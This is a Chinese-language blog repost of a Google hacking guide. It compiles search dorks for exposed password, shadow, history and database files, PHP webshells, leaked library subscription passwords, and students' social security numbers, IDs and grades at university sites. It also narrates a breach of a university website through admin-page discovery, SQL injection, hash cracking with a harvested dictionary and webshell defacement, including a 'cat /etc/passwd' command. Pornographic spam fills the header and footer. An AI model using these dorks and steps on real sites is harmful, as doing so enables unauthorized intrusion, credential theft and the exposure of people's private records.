久久精品精选,精品九九视频,www久久只有这里有精品,亚洲熟女乱色综合一区
    分享

    Google搜索高級技巧 黑客google搜索技巧

     悟靜 2009-08-10
    robots.txt" "Disallow:" filetype:txt

    inurl:_vti_cnf (FrontPage的關鍵索引啦,掃描器的CGI庫一般都有地)

    allinurl: /msadc/Samples/selector/showcode.asp

    /../../../passwd

    /examples/jsp/snp/snoop.jsp

    phpsysinfo

    intitle:index of /admin

    intitle:"documetation"

    inurl: 5800(vnc的端口)或者desktop port等多個關鍵字檢索

    webmin port 10000

    inurl:/admin/login.asp

    intext:Powered by GBook365

    intitle:“php shell*” “Enable stderr” filetype:php 直接搜索到phpwebshell

    foo.org filetype:inc

    ipsec filetype:conf

    intilte:"error occurred" ODBC request where (select|insert) 說白了就是說,可以直接試著查查數據庫檢索,針對目前流行的sql注射,會發達哦

    "Dumping data for table" username password

    intitle:"Error using Hypernews"

    "Server Software"

    intitle:"HTTP_USER_AGENT=Googlebot"

    "HTTP_USER_ANGET=Googlebot" THS ADMIN

    filetype:.doc site:.mil classified 直接搜索軍方相關word

    檢查多個關鍵字:

    intitle:config confixx login password

    "mydomain.com" nessus report

    "report generated by"

    "ipconfig"

    "winipconfig"

    google緩存利用(hoho,最有影響力的東西)推薦大家搜索時候多"選搜索所有網站"

    特別推薦:administrator users 等相關的東西,比如名字,生日等……最慘也可以拿來做字典嘛

    ……

    一些技巧集合:

    1) index.of.password

    1) filetype:blt "buddylist"

    2) "access denied for user" "using password"

    2) intitle:"index of" inurl:ftp (pub | incoming)

    3) "http://*:*@www" domainname

    3) filetype:cnf inurl:_vti_pvt access.cnf

    4) auth_user_file.txt

    4) allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/"

    5) The Master List

    5) inurl:"install/install.php"

    6) allinurl: admin mdb

    6) intitle:"welcome.to.squeezebox"

    7) passlist.txt (a better way)

    7) intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"

    8) "A syntax error has occurred" filetype:ihtml

    8) intitle:Login intext:"RT is ? Copyright"

    9) "# -FrontPage-" inurl:service.pwd

    9) ext:php program_listing intitle:MythWeb.Program.Listing

    10) orA-00921: unexpected end of SQL command

    10) intitle:index.of abyss.conf

    google hacking的簡單實現

    使用google中的一些語法可以提供給我們更多的信息(當然也提供給那些習慣攻擊的人更多他們所想要的.),下面就來介紹一些常用的語法.

    intext:

    這個就是把網頁中的正文內容中的某個字符做為搜索條件.例如在google里輸入:intext:動網.將返回所有在網頁正文部分包含"動網"的網頁.allintext:使用方法和intext類似.

    intitle:

    和上面那個intext差不多,搜索網頁標題中是否有我們所要找的字符.例如搜索:intitle:安全天使.將返回所有網頁標題中包含"安全天使"的網頁.同理allintitle:也同intitle類似.

    cache:

    搜索google里關于某些內容的緩存,有時候也許能找到一些好東西哦.

    define:

    搜索某個詞語的定義,搜索:define:hacker,將返回關于hacker的定義.

    filetype:

    這個我要重點推薦一下,無論是撒網式攻擊還是我們后面要說的對特定目標進行信息收集都需要用到這個.搜索指定類型的文件.例如輸入:filetype:doc.將返回所有以doc結尾的文件URL.當然如果你找.bak、.mdb或.inc也是可以的,獲得的信息也許會更豐富:)

    info:

    查找指定站點的一些基本信息.

    inurl:

    搜索我們指定的字符是否存在于URL中.例如輸入:inurl:admin,將返回N個類似于這樣的連接http://www./xxx/admin,用來找管理員登

    陸的URL不錯.allinurl也同inurl類似,可指定多個字符.

    link:

    例如搜索:inurl:www.4ngel.net可以返回所有和www.4ngel.net做了鏈接的URL.

    site:

    這個也很有用,例如:site:www.4ngel.net.將返回所有和4ngel.net這個站有關的URL.

    還有一些*作符也是很有用的:

    + 把google可能忽略的字列如查詢范圍

    - 把某個字忽略

    同意詞

    . 單一的通配符

    * 通配符,可代表多個字母

    "" 精確查詢

    下面開始說說實際應用

    以下內容均在google上搜索,對于一個居心叵測的攻擊者來說,可能他最感興趣的就是密碼文件了.而google正因為其強大的搜索能力往往會

    把一些敏感信息透露給他們.用google搜索以下內容:

    intitle:"index of" etc

    intitle:"Index of" .sh_history

    intitle:"Index of" .bash_history

    intitle:"index of" passwd

    intitle:"index of" people.lst

    intitle:"index of" pwd.db

    intitle:"index of" etc/shadow

    intitle:"index of" spwd

    intitle:"index of" master.passwd

    intitle:"index of" htpasswd

    "# -FrontPage-" inurl:service.pwd

    有時候因為各種各樣的原因一些重要的密碼文件被毫無保護的暴露在網絡上,如果被別有用心的人獲得,那么危害是很大的.同樣可以用google來搜索一些具有漏洞的程序,例如ZeroBoard前段時間發現個文件代碼泄露漏洞,可以用google來找網上使用這套程序的站點:

    intext:ZeroBoard filetype:php

    或者使用:

    inurl:outlogin.php?_zb_path= site:.jp

    來尋找我們所需要的頁面.phpmyadmin是一套功能強大的數據庫*作軟件,一些站點由于配置失誤,導致我們可以不使用密碼直接對phpmyadmin進行*作.我們可以用google搜索存在這樣漏洞的程序URL:

    intitle:phpmyadmin intext:Create new database

    還http://www./_vti_bin/..%5C..%5C..%5C..%5C..%5C.. /winnt/system32/cmd.exe?dir嗎?用google找找,你也許還可以找到很多古董級的機器。同樣我們可以用這個找找有其他 cgi漏洞的頁面。

    allinurl:winnt system32

    前面已經簡單的說過可以用google來搜索數據庫文件,用上一些語法來精確查找能夠獲得更多東西(access的數據庫,mssql、mysql的連接文件等等).舉個例子示例一下:

    allinurl:bbs data

    filetype:mdb inurl:database

    filetype:inc conn

    inurl:data filetype:mdb

    intitle:"index of" data //在一些配置不正確的apache+win32的服務器上經常出現這種情況,和上面的原理一樣,我們還可以用google來找后臺.

    利用google完全是可以對一個站點進行信息收集和滲透的,下面我們用google對特定站點進行一次測試。

    首先用google先看這個站點的一些基本情況(一些細節部分就略去了):

    site:x

    從返回的信息中,找到幾個該校的幾個系院的域名:

    http://a1.x

    http://a2.x

    http://a3.x

    http://a4.x

    順便ping了一下,應該是在不同的服務器.學校一般都會有不少好的資料,先看看有什么好東西沒

    site:x filetype:doc

    得到N個不錯的doc。

    先找找網站的管理后臺地址:

    site:x intext:管理

    site:x inurl:login

    site:x intitle:管理

    超過獲得2個管理后臺地址:

    http://a2.x/sys/admin_login.asp

    http://a3.x:88/_admin/login_in.asp

    還算不錯,看看服務器上跑的是什么程序:

    site:a2.x filetype:asp

    site:a2.x filetype:php

    site:a2.x filetype:aspx

    site:a3.x filetype:asp

    site:.......

    ......

    a2服務器用的應該是IIS,上面用的是asp的整站程序,還有一個php的論壇

    a3服務器也是IIS,aspx+asp。web程序都應該是自己開發的。有論壇那就看看能不能遇見什么公共的FTP賬號什么的:

    site:a2.x intext:ftp://*:*

    沒找到什么有價值的東西。再看看有沒有上傳一類的漏洞:

    site:a2.x inurl:file

    site:a3.x inurl:load

    在a2上發現一個上傳文件的頁面:

    http://a2.x/sys/uploadfile.asp

    用IE看了一下,沒權限訪問。試試注射,

    site:a2.x filetype:asp

    得到N個asp頁面的地址,體力活就讓軟件做吧,這套程序明顯沒有對注射做什么防范,dbowner權限,雖然不高但已足矣,back a shell不太喜歡,而且看起來數據庫的個頭就不小,直接把web管理員的密碼暴出來再說,MD5加密過。一般學校的站點的密碼都比較有規律,通常都是域名+電話一類的變形,用google搞定吧。

    site:x //得到N個二級域名

    site:x intext:*@x //得到N個郵件地址,還有郵箱的主人的名字什么的

    site:x intext:電話 //N個電話

    把什么的信息做個字典吧,掛上慢慢跑。過了一段時間就跑出4個賬號,2個是學生會的,1個管理員,還有一個可能是老師的賬號。登陸上去:

    name:網站管理員

    pass:a2xxxx7619 //說了吧,就是域名+4個數字

    要再怎么提權那就不屬于本文討論訪問了,呵呵,到此為止。

    這段時間在國外的一些google hack的研究站點看了看,其實也都差不多是一些基本語法的靈活運用,或者配合某個腳本漏洞,主要還是靠個人的靈活思維。國外對于google hack方面的防范也并不是很多,所以大家還是點到為止,不要去搞破壞拉,呵呵。對于一些在win上跑apache的網管們應該多注意一下這方面,一個 intitle:index of就差不多都出來了:)

    1.查找利用php webshell

    intitle:"php shell*" "Enable stderr" filetype:php

    (注: intitle—網頁標題 Enable stderr—UNIX標準輸出和標準錯誤的縮寫filetype—文件類型)。搜索結果中,你能找到很多直接在機器上執

    行命令的web shell來。如果找到的PHPSHELL不會利用,如果你不熟悉UNIX,可以直接看看LIST,這里就不詳細說了,有很多利用價值。要說明的是,我們這里搜索出來的一些國外的PHPSHELL上都要使用UNIX命令,都是system調用出來的函數(其實用百度及其他搜索引擎都可以,只是填寫搜索的內容不同)。這個PHPWEBSHELL是可以直接Echo(Unix常用命令)。一句話就把首頁搞定了:

    echo "召喚" > index.jsp

    現在看看首頁,已經被我們改成: "召喚" 了。

    我們也可以用WGET上傳一個文件上去(比如你要替換的葉子吧)。然后execute Command輸入 cat file > index.html or echo "" > file

    echo "test" >> file

    這樣一條條打出來,站點首頁就成功被替換了。同樣的也可以

    uname -a;cat /etc/passwd

    不過有點要注意,有些WEBSHELL程序有問題,執行不了的,

    2.搜索INC敏感信息

    在google的搜索框中填入:

    Code:.org filetype:inc

    常用的google關鍵字:

    foo1 foo2 (也就是關聯,比如搜索xx公司 xx美女)

    operator:foo

    filetype:123 類型

    site:foo.com 相對直接看網站更有意思,可以得到許多意外的信息

    intext:foo

    intitle: fooltitle 標題哦

    allinurl:foo 搜索xx網站的所有相關連接。(踩點必備)

    links:foo 不要說就知道是它的相關鏈接

    allintilte:foo.com

    我們可以輔助"-" "+"來調整搜索的精確程度

    直接搜索密碼:(引號表示為精確搜索)

    當然我們可以再延伸到上面的結果里進行二次搜索

    "index of" htpasswd / passwd

    filetype:xls username password email

    "ws_ftp.log"

    "config.php"

    allinurl:admin mdb

    service filetype:pwd ....或者某個比如pcanywhere的密碼后綴cif等   

     

    Google推出可以和Outlook同步的Apps同步插件
    Android腳本環境簡介
    Songkick推出演唱會歷史記錄的Wiki頁面
    Wolfram Alpha首次重大更新
    一個存儲用戶信息的類,支持單點登錄
    VS2008 中 JS IntelliSense出錯的解決
    ASP.NET MVC Action Filters中有趣的Http Headers
    利用Ajax讀取Xml文件
    QQ天氣預報分析
    愛單詞,愛Wordnik——功能強大的在線詞典網站出爐

    大學入口突破基礎:不同入口的PW研究
    http://www.google.com/search?q=i ... p;start=10&sa=N

    http://www.google.com/search?q=i ... lr=&newwindow=1


    http://www.google.com/search?hl= ... %3D&btnG=Search



    http://www.google.com/search?hl= ... 3D+&btnG=Search

    http://www.google.com/search?hl= ... 3D+&btnG=Search

    http://www.google.com/search?q=i ... p;start=10&sa=N

    http://www.google.com/search?hl= ... uk+&btnG=Search

    http://www.google.com/search?q=i ... =zh-CN&ie=UTF-8

    http://www.google.com/search?q=s ... ;start=100&sa=N





    ebscohost

    檢索式

    http://www.google.com/search?q=a ... mp;start=0&sa=N


    http://www.google.com/search?hl= ... com&btnG=Search


    http://www.google.com/search?hl= ... e+Selection+Page%22


    firstsearch

    http://www.google.com/search?hl= ... org&btnG=Search


    http://www.google.com/search?q=A ... mp;start=0&sa=N

    proquest

    http://www.google.com/search?hl= ... rd+proquest+welcome

    http://www.google.com/search?q=a ... p;start=30&sa=N

    http://www.google.com/search?q=a ... =utf-8&oe=utf-8
    有些問題,修改后
    http://www.google.com/search?hl= ... 9C%E7%B4%A2&lr=

    inurl:epnet inurl:password=password
    inurl:password= inurl:lib│inurl:library -net -com -org -nl -co.uk
    allinurl:itweb id site:infotrac.galegroup.com
    allinurl:passwd -IPAUTO inurl:welcome site:umi.com
    allinurl:password site:hwwilsonweb.com
    Article.asp?ContributionID
    inurl:access.
    science│medicine│biology inurl:forum inurl:asp?id=│inurl:aspx?id=│inurl:cfm?id=
    intitle:publisher inurl:asp?id=│inurl:aspx?id=│inurl:cfm?id=
    inurl:press inurl:asp?id=│inurl:aspx?id=│inurl:cfm?id=
    inurl:fulltext inurl:asp?id=│inurl:aspx?id=│inurl:cfm?id=
    inurl:sci inurl:asp?id=│inurl:aspx?id=│inurl:cfm?id=
    netid filetype:pdf site:msstate.edu;netid filetype:xls site:msstate.edu
    Personal ID number site:emory.edu
    ID number filetype:xls site:emory.edu
    "ID number" grade site:emory.edu
    ID number filetype:pdf site:emory.edu
    inurl:

    inurl: 是駭客重要的搜尋方法,可搜到網址包括的關鍵字,

    例如填上 allinurl:login password 作搜尋,便會很易找到有 login 和 password 的網頁。

    -------------------------------------------------------------------------------------------
    filetype:

    filetype: 是駭客專用語法,例如想找 mdb 的數據庫檔案,可用 password filetype:mdb 作搜尋,

    便會找到密碼文件,進階用法可配合 inurl: 使用,例如 girl filetype:jpg site:com 便可搜到所有標題 .com 網站,而檔案為 girl.jp 或網頁內容有 girl 字串的。

    -------------------------------------------------------------------------------------------
    Index of /admin

    搜到的結果大多數是容野峇嵺@ index browsing 的網站,隨便按下一個連結便看到網站的資料夾和檔案分佈。
    -------------------------------------------------------------------------------------------
    "Index of /" +password.txt

    有些站長會將密碼儲存成 password.txt 檔案,如配合 index browsing 的弁遄A將 google 的關鍵字串成 "Index of /" +password.txt 作搜尋,便找到很多 password.txt

    "Index of /admin"
    "Index of /password"
    "Index of /mail"
    "Index of /" +passwd
    "Index of /" +password.txt
    "Index of /" +.htaccess
    index of ftp +.mdb allinurl:/cgi-bin/ +mailto

    administrators.pwd.index
    authors.pwd.index
    service.pwd.index
    filetype:config web
    gobal.asax index

    allintitle: "index of/admin"
    allintitle: "index of/root"
    allintitle: sensitive filetype:doc
    allintitle: restricted filetype :mail
    allintitle: restricted filetype:doc site:gov

    inurl:passwd filetype:txt
    inurl:admin filetype:db
    inurl:iisadmin
    inurl:"auth_user_file.txt"
    inurl:"wwwroot/*."


    top secret site:mil
    confidential site:mil

    allinurl: winnt/system32/ (get cmd.exe)
    allinurl:/bash_history

    intitle:"Index of" .sh_history
    intitle:"Index of" .bash_history
    intitle:"index of" passwd
    intitle:"index of" people.lst
    intitle:"index of" pwd.db
    intitle:"index of" etc/shadow
    intitle:"index of" spwd
    intitle:"index of" master.passwd
    intitle:"index of" htpasswd
    intitle:"index of" members OR accounts
    intitle:"index of" user_carts OR user_cart

    password:library
    google:"*** password=***"

    ext:pwd inurl:(service │ authors │ administrators │ users) "# -FrontPage-"
    http://www.google.com/search?q=e ... 2%23+-FrontPage-%22
    這是Frontpage制作者管理權限的信息,本來想透露一下,但怕被倒出去,這里只能點到為止:
    搜索frontpage密碼文件:ext:pwd inurl:(service ¦ authors ¦ administrators ¦ users) "# -FrontPage-"

    "allinurl:ovid.com password"

    administrators.pwd.index
    authors.pwd.index
    service.pwd.index
    filetype:config web
    gobal.asax index

    allintitle: "index of/admin"
    allintitle: "index of/root"
    allintitle: sensitive filetype:doc
    allintitle: restricted filetype :mail
    allintitle: restricted filetype:doc site:gov

    inurl:passwd filetype:txt
    inurl:admin filetype:db
    inurl:iisadmin
    inurl:"auth_user_file.txt"
    inurl:"wwwroot/*."
    ezproxy inurl:bbs



    ssn│"Social Security Number " site:***.edu
    barcode site:***.edu
    id site:***.edu
    000000000..999999999 site:***.edu
    numrange:000000000-999999999 site:***.edu
    ssn name site:***.edu
    id name site:***.edu
    grade│score site:***.edu filetype:xls     (pdf/doc,etc)
    quiz│exam│test site:***.edu filetype:xls     (pdf/doc,etc)
    inurl:roster site:***.edu
    inurl:summer site:***.edu filettype:
    不少學校的NETID是EMAIL:
    "@***>edu" site:***.edu

    id name birth│dob│birthday│born site:

    另外,善于利用GOOGLE的圖像功能
    card│id│barcode site:***.edu
    card│id│barcode (nameof school)

    希望大家能給出自己常用的GOOGLE檢索式來交



    密碼檢索詞
    medicine journal ID pw
    chemWEB.COM PASSWORD
    Virtuelle Bibliothek PASSWORD
    “Online Full Text Resources password”
    “health sciences library password ”
    “OvidLWW password”
    “medizin bibliothek password”
    “medizin Volltext password”
    “medizin literatur password”
    “health ejournals password ”
    “medizin elektronik password”
    Medizin Bibliothek Datenbank Benutzername Kennwort
    medicina BIBLIOTECA password
    médecine PéRIODIQUES éLECTRONIQUES password
    health ejournals password
    American Journal of Medicine OnLine FULL TEXT Journals username password
    medicine journal fulltext username


    inurl:2048 inurl:login



    allinurl:password user site:epnet.com
    intitle:"EBSCO Publishing Service Selection Page"

    allinurl:cert= site:umi.com
    +library +username +password proquest welcome



    XX(數據庫名) 賬號 密碼 inurl:edu.cn



    inurl:8080 inurl:login



    最早以前,我曾經用 " password+journal" 方法搜過一些,
      
      效果也很明顯。后來有人提出一個號稱通吃天下文獻數據庫的密碼萬
      
      能的公式,
       password=welcome+(X)
      
      x 可以為任何一個文獻數據庫的名稱,可以寫成
      
       password=welcome+ProQuest
       password=welcome+Ingenta
       password=welcome+EBSCO。。。。。。。。。
      
      等等,放到google里后,檢索為 “password welcome ProQuest”
      
      這樣會有好多的密碼出現,你慢慢嘗試吧!
      
      據說這個方法是一個叫 Hmongbook 的人概括出來的,真感謝他!
      
      我個人使用后感覺不錯!
      
       另外,并不是所有的數據庫登陸都是username password,比如我前
      
      幾天查找的英國economist周刊,他的檢索關鍵詞就應該
      
      為: "password e-mail ",這需要各位的細心了!
      
      
    (接GOOGLE)
       上述一種常用方法,現在也提供一下個人以及網友提供的檢索常
      
      用搜索詞的一些例子,模式上基本大同小異
      
      medicine journal ID pw
      chemWEB.COM PASSWORD
      Virtuelle Bibliothek PASSWORD
      “Online Full Text Resources password”
      “health sciences library password ”
      “OvidLWW password”
      “medizin bibliothek password”
      “medizin Volltext password”
      “medizin literatur password”
      “health ejournals password ”
      “medizin elektronik password”
      medicina BIBLIOTECA password
      médecine PéRIODIQUES éLECTRONIQUES password
      health ejournals password
      American Journal of Medicine OnLine FULL TEXT Journals username password
      medicine journal fulltext username
      
      同時,如果你足夠細心,你會在這樣的檢索中有很多以外的收獲。
      
      國外有很多密碼頁,上面公布很多期刊數據庫的密碼和登陸方式
      
      如果GOOGLE在檢索的頁面上出現 " PSAAWORD" 字樣很多,那就說明
      
      這是一個密碼頁。你可以保存起來,說不定今后你會用到他們。
      
      請各位試試看!


    1.EZ搜索:
    allinurl:ezproxy edu login
    allinurl:login +edu ezproxy OR proxy
    allinurl: login ezproxy OR proxy OR lib OR library OR 2048

    2.數字型EZ密碼
    site:×××.edu numrange:100000000..100999999

    3.Ebsco搜索式,很多Ebsco密碼為password
    password=password site:epnet.com


    inurl:access.
    如nature:
    http://80-www.nature.com.access.:808/index.html



    password intitle:"Ejournal Information Page"



    "# -FrontPage-" inurl:service.pwd
    "AutoCreate=TRUE password=*"
    "http://*:*@www" domainname
    "index of/" "ws_ftp.ini" "parent directory"


    allinurl: admin mdb
    auth_user_file.txt
    config.php
    eggdrop filetype:user user
    etc (index.of)


    filetype:bak inurl:"htaccess│passwd│shadow│htusers
    filetype:cfg mrtg "target
    · " -sample -cvs -example
    filetype:cfm "cfapplication name" password
    filetype:conf oekakibbs
    filetype:conf slapd.conf
    filetype:config config intext:appSettings "User ID"
    filetype:dat "password.dat"
    filetype:dat wand.dat
    filetype:inc dbconn
    filetype:inc intext:mysql_connect
    filetype:ini ServUDaemon
    filetype:ini wcx_ftp

    allinurl: password ovid



    google 各種定位參數
    ◆定位教育系統網站
    inurl:edu OR inurl:edu.cn OR inurl:edu.net OR ...

    ◆定位圖書館網站
    inurl:lib OR inurl:library
    與site:.edu或者site:.edu.net或者site:.edu.cn結合,返回結果的針對性更強。

    ◆定位數據庫網頁
    inurl:database OR inurl:databases OR inurl:db OR inurl:dbs OR inurlnlinedb OR inurlnlinedbs
    inurl:database
    inurl:databases
    inurl:db
    inurl:dbs
    inurl:webdb
    inurl:webdbs
    inurl:libdatabase
    inurlnlinedb
    inurlnlinedbs
    inurlnlinedatabase
    inurlnlinedatabases
    inurl:elektronik
    inurl:resource
    inurl:resources
    inurl:eresource
    inurl:eresources
    inurl:esource
    inurl:esources
    inurl:collection
    inurl:collections
    inurl:dblist
    inurl:eledata
    inurl:elecindex
    inurl:alldata
    inurl:periodical
    inurl:periodicals
    inurl:journal
    inurl:journals
    inurl:ejournal
    inurl:e-journal
    inurl:ejournals
    inurl:e-journals
    inurl:subscription
    inurl:subscriptions
    inurl:elibrary

    ◆定位試用數據庫網頁
    inurl:database OR inurl:databases OR inurl:trialdb OR inurl:trial
    inurl:trialdatabase
    inurl:trialdb
    inurl:trial
    inurl:trials
    inurl:trydb
    inurl:dtest
    inurl:dbtest
    inurl:try
    inurl:test
    inurl:preview
    inurl:renewal
    inurl:newtrial
    inurl:dbeval
    inurl:evaldb

    ◆定位全文數據庫網頁
    inurl:fulltext OR inurl:full-text

    ◆定位密碼頁
    inurl:password OR inurl:passwords OR inurl:pass OR inurlWD OR inurlW OR inurl:pswd OR inurl:passwd OR inurl:passwr OR inurl:passw OR inurl:passwort
    inurl:password
    inurl:passwords
    inurl:pwd
    inurl:pw
    inurl:pswd
    inurl:pass
    inurl:passwd
    inurl:passwort
    inurl:passwr
    inurl:p
    inurl:passw
    inurl:epass
    inurl:forget
    inurl:forgot
    inurl:retrieve
    inurl:retrieval
    inurl:get
    inurl:entry
    inurlff-campus
    inurlffcampus

    Japanese パスワード
    french passe
    spanish contrase?a [s.f.], santo [s.m.], santo y se?a [s.m.], se?a
    german Kennwort (<-e> [n.], Passwort (<-¨er> [n.], Erkennungswort [n.]
    portuguese senha


    ebscohost
    1,http://www.google.com/search?q=a ... mp;start=0&sa=N
    關鍵詞:allinurl:cpidlogin site:epnet.com

    2,http://www.google.com/search?hl= ... com&btnG=Search
    關鍵詞:allinurl:password user site:epnet.com

    3,http://www.google.com/search?hl= ... e+Selection+Page%22
    關鍵詞:intitle:"EBSCO Publishing Service Selection Page

    firstsearch
    1,http://www.google.com/search?hl= ... org&btnG=Search
    關鍵詞:allinurl:password site:oclc.org

    2,http://www.google.com/search?q=A ... mp;start=0&sa=N
    關鍵詞:thorization password 100 oclc.org

    hwwilsonweb
    1,http://www.google.com/search?hl= ... com&btnG=Search
    關鍵詞:allinurl:password site:hwwilsonweb.com

    infotrac
    1,http://www.google.com/search?hl= ... 9C%E7%B4%A2&lr=
    關鍵詞:allinurl:itweb id site:infotrac.galegroup.com

    medconsult
    1,http://www.google.com/search?q=a ... =utf-8&oe=utf-8
    關鍵詞:allinurl:groups site:mdconsult.com

    2,http://www.google.com/search?hl= ... 9C%E7%B4%A2&lr=
    關鍵詞:inurl:user password site:mdconsult.com


    OVID全庫
    這個大家都知道很多了,就不再多說了
    allinurl:ovidweb.cgi?QS= site:ovid.com


    proquest
    1,http://www.google.com/search?hl= ... rd+proquest+welcome
    關鍵詞:+library +username +password proquest welcome

    2,http://www.google.com/search?hl= ... 9C%E7%B4%A2&lr=
    關鍵詞:cert= + umi.com

    3,http://www.google.com/search?q=a ... p;start=30&sa=N
    關鍵詞:allinurl:passwd -ipauto site:umi.com


    維普數據庫
    allintitle:歡迎使用維普數據庫
    allintitle:維普 數據庫
    allintitle:維普中刊數據庫檢索



    password inurl: anesthesiology



    cnki pwd(pw)密碼



    intext:ZeroBoard filetype:php
    allinurl:winnt system32
    allinurl:bbs data
    filetype:mdb inurl:database
    filetype:inc conn
    inurl:data filetype:mdb
    intitle:"php shell*" "Enable stderr" filetype:php
    Code: .org filetype:inc
    intitle:"index of" etc
    intitle:"Index of" .sh_history
    intitle:"Index of" .bash_history
    intitle:"index of" passwd
    intitle:"index of" people.lst
    intitle:"index of" pwd.db
    intitle:"index of" etc/shadow
    intitle:"index of" spwd
    intitle:"index of" master.passwd
    intitle:"index of" htpasswd
    "# -FrontPage-" inurl:service.pwd



    library "last name" "four│4 digits" inurl:login
    inurl:scripts/cgi-bin/logs/
    inurl:edu inurl:lib│library inurl:login (傳統入口)
    library proxy inurl:edu
    intitle:試用數據庫 inurl:lib[/post]
    各有深意


    ovid的google搜索式建議:
    密碼的搜索式一:sitevid.com password
    式二:“gateway.ovid.com/ovidweb.cgi”
    “ctr”+”F” 查password= 或 id=


    我曾用過的密碼檢索詞
    medicine journal ID pw
    chemWEB.COM PASSWORD
    Virtuelle Bibliothek PASSWORD
    “Online Full Text Resources password”
    “health sciences library password ”
    “OvidLWW password”
    “medizin bibliothek password”
    “medizin Volltext password”
    “medizin literatur password”
    “health ejournals password ”
    “medizin elektronik password”
    Medizin Bibliothek Datenbank Benutzername Kennwort
    medicina BIBLIOTECA password
    médecine PéRIODIQUES éLECTRONIQUES password
    health ejournals password
    American Journal of Medicine OnLine FULL TEXT Journals username password
    medicine journal fulltext username
    目前經過驗證,最簡單有效的密碼檢索式應該是:
    "medicine journal password OR pw OR pwd "american heart journal" -telnet -forg
    et -forgot -required"




    site:edu password journal
    site:co.uk password journal
    site:edu.au password journal
    site:ru springer password 


    關鍵詞:allinurl:login.asp?user= site:epnet.com

    http://www.google.com/search?hl= ... com&btnG=Search



    部分域名檢索關鍵詞
    site:ac.jp password
    site:ac.th password
    site:ac.kr password
    site:ac.uk password
    site:edu.mx password
    password 可以換成 username or userid或合用等


    超星圖書
    inurl:bookhtm/book.asp?lib=
    inurl:bookhtm
    inurl:bookhtm/gjsearch.asp
    inurl:cxbook/index.asp



    要搜索數據庫免費入口,關鍵詞的選擇是十分重要(4)使用搜索語法 inurl,intitle等(必要時用)
    如:維普的數據庫頁面的url中幾乎都含有vip,因此,有時可用 "inurl:vip"鎖定范圍。
    運用以上(1)-(3)的任一關鍵詞,很容易找到維普數據庫的免費入口,而且往往不止一個,此法屢試不爽。此原理方法同樣適用于萬方數據庫。這樣就再也不需要別人告訴你數據庫入口地址和密碼之類的東東了


    的,維普也不例外。通過仔細分析維普數據庫的使用頁面,并比較百度搜索結果,我們可以選擇如下關鍵詞在百度中進行搜索(推薦級別由高到低):
    (1)intitle:維普中刊數據庫檢索
    (2)若需閱讀全文,請先下載并安裝維普瀏覽器
    (3)歡迎使用維普數據庫

      本站是提供個人知識管理的網絡存儲空間,所有內容均由用戶發布,不代表本站觀點。請注意甄別內容中的聯系方式、誘導購買等信息,謹防詐騙。如發現有害或侵權內容,請點擊一鍵舉報。
      轉藏 分享 獻花(0

      0條評論

      發表

      請遵守用戶 評論公約

      類似文章 更多

      主站蜘蛛池模板: 亚洲国产日韩在线人成蜜芽| 丁香五月婷激情综合第九色| 亚洲成人av综合一区| 桃花岛亚洲成在人线AV| 国产免费一区二区三区不卡| 国产精品一亚洲AV日韩AV欧| 久久99国产精品尤物| 国产对白老熟女正在播放| 激情 自拍 另类 亚洲| 亚洲精品无码久久毛片| 国产精品国三级国产av| 人妻丝袜AV中文系列先锋影音| 欧美老熟妇乱子伦牲交视频| 无码人妻精品一区二区三区久久久| 国产精品中文字幕av| 国产午夜亚洲精品不卡下载| 国产精品黑色丝袜在线观看| 97欧美精品系列一区二区| 国产真人无码作爱视频免费| 国产高清在线男人的天堂| 精品一区二区三区自拍图片区| 在线 欧美 中文 亚洲 精品| 55夜色66夜色国产精品视频 | 欧美老人巨大XXXX做受视频| 少妇被躁爽到高潮无码人狍大战| 午夜男女爽爽影院在线| 亚洲精品在看在线观看| 欧美另类图区清纯亚洲| 又粗又黑又大的吊AV| 国产女主播白浆在线看| 久久精品国产亚洲av麻豆软件 | 97午夜理论电影影院| 韩国免费a级毛片久久| 天天综合亚洲色在线精品| 亚洲av日韩在线资源| 欧美成人精品高清在线观看| 日本一区二区三区免费播放视频站 | 国产AV午夜精品一区二区三区| 福利在线视频一区二区| 亚洲乱码在线卡一卡二卡新区| 免费无码成人AV片在线 |